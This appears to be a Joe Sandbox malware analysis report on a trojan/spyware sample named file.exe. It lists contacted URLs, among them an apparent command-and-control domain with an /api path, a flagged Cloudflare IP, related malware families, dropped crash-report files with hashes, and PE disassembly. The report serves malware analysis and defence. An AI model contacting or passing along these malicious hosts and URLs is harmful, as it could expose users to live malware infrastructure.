00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1775886728.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1790419957.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2032635676.0000000002B31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.microsof	file.exe, 00000000.00000003.1726908542.0000000004F7E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/:	file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/apili	file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop:443/api	file.exe, 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738900570.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/l	file.exe, 00000000.00000003.1795851667.0000000002B2A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1795730443.0000000002B31000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	stationacutwo.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466292
Start date and time:	2024-07-02 19:01:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 34 Number of non-executed functions: 126
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:02:02	API Interceptor	8x Sleep call for process: file.exe modified
13:02:32	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Inquiry No PJO-4010574.exe	Get hash	malicious	FormBook	Browse	www.oc7o0.top/2zff/?iHmHOtK=4L8xoD0W4Zo4sy88OPxzXkM4Et1OXrliZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7znic/DfJyEGJbg1Pv28u2ofuxZkWteJjYs=&L480=nFsp
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/TbaYPT0S/download
	nJ8mJTmMf0.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	hkLFB22XxS.exe	Get hash	malicious	FormBook	Browse	www.cavetta.org.mt/yhnb/
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	filetransfer.io/data-package/mJcm5Gfa/download
	http://url.usb.m.mimecastprotect.com/s/SPnzCDwVznT7kyA0HkOsZj?domain=linkscan.io	Get hash	malicious	HTMLPhisher	Browse	emmalee.sa.com/favicon.ico
	file.exe	Get hash	malicious	FormBook	Browse	www.cavetta.org.mt/yhnb/
	6Z4Q4bREii.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	000366cm.nyashka.top/phpflowergenerator.php
	DHL Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.coinwab.com/efdt/
	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.evoolihubs.shop/fwdd/?CbPtaF=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&NV=CzkTp6UpmNmd

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://xxxjkam8s4e.z13.web.core.windows.net/?click_id=611h5aaw1cly4j0bmp&tid=701&subid=otka.com&ref=otka.com&883#	Get hash	malicious	TechSupportScam	Browse	188.114.97.3
	https://equifax.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=dcsdataquality%40equifax.com&p=dd344d89-e9f0-4ad2-b235-09d9246d1e0f#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fdd344d89-e9f0-4ad2-b235-09d9246d1e0f%2Fdata%2Fmetadata&dk=6iPNYDhOZu4bgqt2whRHwXK7U%2FAD3%2BLSMPIUpzwYeKw%3D	Get hash	malicious	Unknown	Browse	104.16.117.116
	Remittance Advice.html	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	https://d3iazzw2aq.transsantos.com.br/Facebook.com/5MTE0XyUvddHaCu5rQ21ZpgdMMqDVaFyCyeBzYy3YKiKgHKLLWq8pXY9KiAVYP2BTqwZ9gFjZfUghzQcC9kyB1gfJmu2ebUNmRjGCzJ4RwcxVJWJH9pv78uuEjWKhL0iAz9Mdy7JQaLNFi8EE9y6Na3FjPUp0f1WwxQrJSD9xGypM2nuJy2GKkVGCcLwESgp7y7in7tvLSFZgMKGpr3cN35mAJQhiWpNZngRx-cG9jb25maXJtYXRpb25zQGxpcGFyaWZvb2RzLmNvbQ==	Get hash	malicious	Unknown	Browse	1.1.1.1
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.45.251
	Hilcorp-updated agreement.pdf	Get hash	malicious	Unknown	Browse	104.18.2.35
	https://yjfvmv7.z13.web.core.windows.net/win/index.html?call=1(877)-893-3571#	Get hash	malicious	Unknown	Browse	104.17.25.14
	Susan Carapanta shared J.D with you.eml	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CxFHH8i5A3U7lzl-2BTzhlR6ei7mav1762I-2BKvT-2Fk6a5kLUgUMy5HF64b8WrTGY5vFuTce1vV41Ab4MyQrOplI7tU5VMylICgXEGMOcA3lDJVs2-2BVa-2BmXMPQdZkUiKRaSMtyb23BSU13fAy94eMgbbpWGHvMycQlWPfPxKMDzYSeE5kVyJwAD8pphYTNvERMYMmCwKiJ4MAAmjiqW4JLB-2FG-2FQ-3D-3D7yf0_p4A4YQt8epDIK9HlKea9sV-2FOtqGPyWoKM4LjM22Z6dbxuq3iGRjCzJ5YebtyuIEIvPEZ2Hi95MwGR7xtnodhDM8Iaj1NIu5u9A6c7A4CmoLtPLA1AYBR71m8begekekKFtQMeZCPuBYlMudBl33wvV-2Fu39N8kuAyCAOxmPkHrWSpXaxCDYANLX8xWXDor5baRk0uk-2FQ6kftnlL1vkLQkwQ-3D-3D	Get hash	malicious	Unknown	Browse	1.1.1.1
	BAD.HTML	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Secured_Document.Docx	Get hash	malicious	Unknown	Browse	188.114.97.3
	invoicepast.pdf.lnk.mal.lnk	Get hash	malicious	ScreenConnect Tool	Browse	188.114.97.3
	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	188.114.97.3
	6RVmzn1DzL.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Build.exe	Get hash	malicious	DBatLoader, Neshta	Browse	188.114.97.3
	F.exe	Get hash	malicious	AsyncRAT, Neshta, XWorm	Browse	188.114.97.3
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	188.114.97.3
	MOD_200.pdf.lnk	Get hash	malicious	Arc Stealer	Browse	188.114.97.3
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	188.114.97.3
	capisp.dll.dll	Get hash	malicious	Bazar Loader, BruteRatel, Latrodectus	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_e1b8ee67c28e1740921d4bcadce1f30172278_35621c73_1a34e8b5-95ff-4b09-8773-76e45477dcb2\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.984104509586134
Encrypted:	false
SSDEEP:	192:F09mTldvsPliQtiL0CLjGI3jBJFPzuiFKZ24IO8TVBE:S9ssNimiYCLj9j9zuiFKY4IO8X
MD5:	B2567B9EF12BE2BFEA990AE385D226F0
SHA1:	45FCDA1A315BA086106F5ADAD2CD6D86360BE8DE
SHA-256:	865E8EAAA575237C7FC0CD59FDB4D9980428B074E767AE4C1FCEA9F2665DFB22
SHA-512:	FD04B0B16D175F31C2533DBA08B3E1DC6FEF8CCFD9877F8345564AB1DE94706B2BDF0B47188F2BFA47F29EDAB180D7869338DAD998A46FA213ED19261C21A8F2
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.1.3.3.3.2.1.7.4.8.3.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.1.3.3.3.2.9.8.7.3.2.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.3.4.e.8.b.5.-.9.5.f.f.-.4.b.0.9.-.8.7.7.3.-.7.6.e.4.5.4.7.7.d.c.b.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.e.c.7.7.b.1.-.0.6.f.5.-.4.9.2.9.-.b.6.3.3.-.1.2.4.9.e.b.e.4.9.c.c.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.7.0.-.0.0.0.1.-.0.0.1.4.-.4.0.0.5.-.3.a.8.9.a.1.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.e.6.7.d.5.8.f.0.0.0.3.e.4.5.0.6.7.1.1.c.7.6.e.8.2.9.1.5.b.a.4.f.7.d.5.3.b.8.9.3.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER10D5.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8296
Entropy (8bit):	3.694601812433928
Encrypted:	false
SSDEEP:	192:R6l7wVeJGCvO6k/6Y9xSU1rFgmfBWei5DpDB89b0NsfoF8m:R6lXJE6E6YLSU15gmf8D5o0Gfor
MD5:	4FCB0DEFD207A60B6B5120785C4CD8E6
SHA1:	68475D9CE7564568668A2F981BAF0D8F5A7DB832
SHA-256:	8693EE92F1ADD51B93B9B5686B4F7CF98D4B98C4C33C6EFF84EF8D5AE149F951
SHA-512:	4CC62AF102AF12BAB4F758438B8674347DF1857C3126C718170CD0C8BBF5F0AD9C7247BDF82AC9EBD4805E71594E6D313B1E33DA567A508BA042F357B57F53D0
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1105.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.427221069305402
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VY9Ym8M4JStFNNo+q8UBw5NRT8At5d:uIjfxI7X37VZJaNoM5NRT75d
MD5:	6A11131CF06A5BC4A3D5C7AFA81BFAE7
SHA1:	B46D59A12A5442650C71247CF9BC844BB259A74C
SHA-256:	6FC35BE42A90DE960B307B36A974790468F6BA2559D84C2B27790303E1978939
SHA-512:	41F73BAD2CCC574358000EAE2BAE6D598B76AF65E5D4EE81C6C43DE2EBDCF55473D8FB36A6508A378D8067FA3875A0B26398D8F62C797A576CEC8B9B1DBFFDA0
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="393604" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jul 2 17:02:12 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46094
Entropy (8bit):	2.6367418174551056
Encrypted:	false
SSDEEP:	192:PQhBovXtjDZ7tODBvoDkpX4eq71DFlKbWgdNyeTPHn5ys8OnFZ6c:ohBUjDZMDBQIpXnfawyebH5h8OFZ6
MD5:	CDD9D626B6F8E569D59A31D0D9E5E4B4
SHA1:	84029250E0AC81378725278F88B8BBC3AF6A0542
SHA-256:	0703B5B8B8CE59DEFA85D3D3EEC9AC40C1B47A0B56E101877987C4BD937F7DC9
SHA-512:	AB84B55952C0B8D638F78E8A04EC1697FA73D122D49A51B743E4FE2C9D3078C6083A87C5A7E7DBE142512ABB52D348DE440D0C6F5AC1B9A5BE4A2274227DAFFD
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........2.f............4...............H........................1..........`.......8...........T...........x=...v..........x ..........d"..............................................................................eJ......."......GenuineIntel............T.......p....2.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465311077676866
Encrypted:	false
SSDEEP:	6144:kIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbc:ZXD94+WlLZMM6YFH1+c
MD5:	71A9096BE5672F6A9C1B9E5AB871CB80
SHA1:	05F3E1CD225B44F2FB77D7A1F69680AA3C81C5E3
SHA-256:	F8CEE971EE782300D35B3F14BEB763C78929608D34E9760ABC9E4E8978B936D6
SHA-512:	D086205E473BF6C7C515C705C5A68FC72520B40F2A212268DC8A7296C1D2A4C55702E031A5D477016CEE0128D5572B4D64D5953EDB1B3E92313F22885CFD9414
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..................................................................................................................................................................................................................................................................................................................................................)..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.28304605913046
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	297'472 bytes
MD5:	2f694c5080f96479f2bea3f4d07200f1
SHA1:	e67d58f0003e4506711c76e82915ba4f7d53b893
SHA256:	60ec2c168365bcd32ac7a7ae6ad0d1fea4cc948590ac0ed7c621599f256964a0
SHA512:	5bd183c62585d02aa98909b748dc9395fd1f942a5f3a54319f4a0a404a26bd595b4cd14da3111abfc82f2067170d771e0e85293340cc6fe35878501796a76d8e
SSDEEP:	6144:KPLVLEybu2Ts3URzcx4ahao3vewTbSo2BOwCk9ZC7:KP5LLbxsEuxj/3veUbZ2BOw1
TLSH:	D6548C6069F79926FFF75B312A70A6D40A3BBC637A70818E2540323E1D776D18A63713
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._...................................{...<...........v...........................Rich............PE..L....0.c.................D.

File Icon


Icon Hash:	cb97334d5555599a

Static PE Info

General

Entrypoint:	0x401908
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63BC307F [Mon Jan 9 15:19:27 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	039b1745d3ec0d69297e0716539e775c

Entrypoint Preview

Instruction
call 00007F21A0DADA45h
jmp 00007F21A0DA9D0Eh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0043A918h], eax
mov dword ptr [0043A914h], ecx
mov dword ptr [0043A910h], edx
mov dword ptr [0043A90Ch], ebx
mov dword ptr [0043A908h], esi
mov dword ptr [0043A904h], edi
mov word ptr [0043A930h], ss
mov word ptr [0043A924h], cs
mov word ptr [0043A900h], ds
mov word ptr [0043A8FCh], es
mov word ptr [0043A8F8h], fs
mov word ptr [0043A8F4h], gs
pushfd
pop dword ptr [0043A928h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043A91Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0043A920h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043A92Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0043A868h], 00010001h
mov eax, dword ptr [0043A920h]
